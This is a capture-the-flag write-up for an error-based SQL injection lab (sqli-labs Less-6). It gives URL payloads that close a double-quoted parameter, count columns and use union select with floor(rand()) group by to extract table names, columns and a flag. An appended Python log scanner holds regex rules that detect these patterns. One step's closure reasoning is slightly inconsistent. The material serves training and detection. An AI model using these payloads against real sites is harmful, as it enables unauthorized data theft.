Less-6
Less-6 GET - Double Injection - Double Quotes - String
1. Determine whether an injection exists
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1"
Error response => injection exists
2. Determine the parameter type
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1 and 1=2 --+
Normal response => string injection
3. Close the parameter
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" and 1=2 --+
Error response
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1 and 1=1 --+
Normal response => closure successful
4. Find out how many columns the table in the site's back-end database has
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" order by 3 --+
Normal response
https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" order by 4--+
Error response => 3 columns
5. Run a double-injection query to find the current database
https://636-22d36cf9-39bc-42ee-a65d-21cac444c7fb.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((database()),floor(rand()*2))as a from information_schema.tables group by a --+
6. Query the tables in the current database
https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+
7. View the columns in the fThDtk9a table
https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name="fThDtk9a" limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+
8. View the data in the table's flag column
https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select flag from fThDtk9a limit 3,1),floor(rand()*2))as a from information_schema.tables group by a --+
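The requests in steps 3 to 8 leave a recognizable trail in web server logs. The following is an added example, not part of the original write-up: a log scanner that decodes each query parameter and flags the patterns used above (quote closure with a trailing comment, order by N, union select, information_schema, and floor(rand()) combined with group by). The rule names, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Rules applied to each decoded query-parameter value (names are illustrative).
RULES = {
    "quote_then_comment": re.compile(r"[\"'].*(--\s|--$|#)", re.S),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "rand_group_by": re.compile(r"floor\s*\(\s*rand\s*\(.*\bgroup\s+by\b", re.I | re.S),
}
# Client address and request target from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the sorted rule names matched by any query parameter of target."""
    hits = set()
    # parse_qsl percent-decodes and maps '+' to a space, as the server would.
    for _key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(name for name, rx in RULES.items() if rx.search(value))
    return sorted(hits)

def scan(log_lines):
    """Group matched rules by client address; clients with no hits are omitted."""
    by_client = defaultdict(set)
    for line in log_lines:
        m = REQUEST.match(line)
        if m:
            by_client[m.group(1)].update(classify(m.group(2)))
    return {ip: sorted(rules) for ip, rules in by_client.items() if rules}

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /?id=1%22%20order%20by%204--+ HTTP/1.1" 200 480',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /?id=1%22%20union%20select%20null,count(*),concat((database()),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%20--+ HTTP/1.1" 200 530',
    '198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /?id=2&name=O%27Brien HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(rules))
```

A benign value containing a lone apostrophe (the O'Brien line) matches no rule, because the closure rule requires a comment marker after the quote.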
